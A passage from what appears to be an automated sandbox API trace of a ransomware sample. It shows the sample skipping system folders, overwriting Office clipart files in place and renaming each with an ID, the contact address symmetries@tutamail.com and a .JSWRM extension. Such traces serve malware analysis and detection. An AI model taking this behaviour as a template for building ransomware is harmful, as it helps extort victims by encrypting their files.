RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0075.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00174_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00174_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00174_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0075.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0075.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00174_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00174_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00174_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0075.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.480] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.480] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8366) returned 1 [0075.480] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20a0) returned 0x24c1d0 [0075.481] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x20a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x20a0, lpOverlapped=0x0) returned 1 [0075.482] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.482] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x20a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x20a0, lpOverlapped=0x0) returned 1 [0075.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.483] CloseHandle (hObject=0x460) returned 1 [0075.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0075.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0075.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0075.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0075.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0075.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.483] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0075.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.484] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1370, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00184_.WMF", cAlternateFileName="")) returned 1 [0075.484] lstrcmpiW (lpString1="BS00184_.WMF", lpString2=".") returned 1 [0075.484] lstrcmpiW (lpString1="BS00184_.WMF", lpString2="..") returned 1 [0075.484] lstrcmpiW (lpString1="BS00184_.WMF", lpString2="...") returned 1 [0075.484] lstrcmpiW (lpString1="BS00184_.WMF", lpString2="windows") returned -1 [0075.484] lstrcmpiW (lpString1="BS00184_.WMF", lpString2="recovery") returned -1 [0075.484] lstrcmpiW (lpString1="BS00184_.WMF", lpString2="perflogs") returned -1 [0075.484] lstrcmpiW (lpString1="BS00184_.WMF", lpString2="documents and settings") returned -1 [0075.484] lstrcmpiW (lpString1="BS00184_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.484] lstrcmpiW (lpString1="BS00184_.WMF", lpString2="system volume information") returned -1 [0075.484] lstrcmpiW (lpString1="BS00184_.WMF", lpString2="msocache") returned -1 [0075.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0075.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00184_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00184_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00184_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0075.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0075.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00184_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00184_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00184_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0075.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.485] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4976) returned 1 [0075.485] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1370) returned 0x24c1d0 [0075.485] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1370, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1370, lpOverlapped=0x0) returned 1 [0075.489] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.489] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1370, lpOverlapped=0x0) returned 1 [0075.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.489] CloseHandle (hObject=0x460) returned 1 [0075.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0075.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0075.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0075.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0075.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0075.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.490] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0075.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.490] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31f4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00186_.WMF", cAlternateFileName="")) returned 1 [0075.491] lstrcmpiW (lpString1="BS00186_.WMF", lpString2=".") returned 1 [0075.491] lstrcmpiW (lpString1="BS00186_.WMF", lpString2="..") returned 1 [0075.491] lstrcmpiW (lpString1="BS00186_.WMF", lpString2="...") returned 1 [0075.491] lstrcmpiW (lpString1="BS00186_.WMF", lpString2="windows") returned -1 [0075.491] lstrcmpiW (lpString1="BS00186_.WMF", lpString2="recovery") returned -1 [0075.491] lstrcmpiW (lpString1="BS00186_.WMF", lpString2="perflogs") returned -1 [0075.491] lstrcmpiW (lpString1="BS00186_.WMF", lpString2="documents and settings") returned -1 [0075.491] lstrcmpiW (lpString1="BS00186_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.491] lstrcmpiW (lpString1="BS00186_.WMF", lpString2="system volume information") returned -1 [0075.491] lstrcmpiW (lpString1="BS00186_.WMF", lpString2="msocache") returned -1 [0075.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0075.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00186_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00186_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00186_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0075.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0075.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00186_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00186_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00186_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0075.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.491] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12788) returned 1 [0075.492] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x31f0) returned 0x24c1d0 [0075.492] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x31f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x31f0, lpOverlapped=0x0) returned 1 [0075.494] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.494] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x31f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x31f0, lpOverlapped=0x0) returned 1 [0075.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.494] CloseHandle (hObject=0x460) returned 1 [0075.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0075.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0075.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0075.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0075.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0075.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.495] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0075.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.495] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc20, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS00200_.WMF", cAlternateFileName="")) returned 1 [0075.495] lstrcmpiW (lpString1="BS00200_.WMF", lpString2=".") returned 1 [0075.495] lstrcmpiW (lpString1="BS00200_.WMF", lpString2="..") returned 1 [0075.495] lstrcmpiW (lpString1="BS00200_.WMF", lpString2="...") returned 1 [0075.495] lstrcmpiW (lpString1="BS00200_.WMF", lpString2="windows") returned -1 [0075.495] lstrcmpiW (lpString1="BS00200_.WMF", lpString2="recovery") returned -1 [0075.495] lstrcmpiW (lpString1="BS00200_.WMF", lpString2="perflogs") returned -1 [0075.495] lstrcmpiW (lpString1="BS00200_.WMF", lpString2="documents and settings") returned -1 [0075.495] lstrcmpiW (lpString1="BS00200_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.496] lstrcmpiW (lpString1="BS00200_.WMF", lpString2="system volume information") returned -1 [0075.496] lstrcmpiW (lpString1="BS00200_.WMF", lpString2="msocache") returned -1 [0075.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0075.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00200_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00200_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00200_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0075.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0075.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00200_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS00200_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS00200_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0075.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 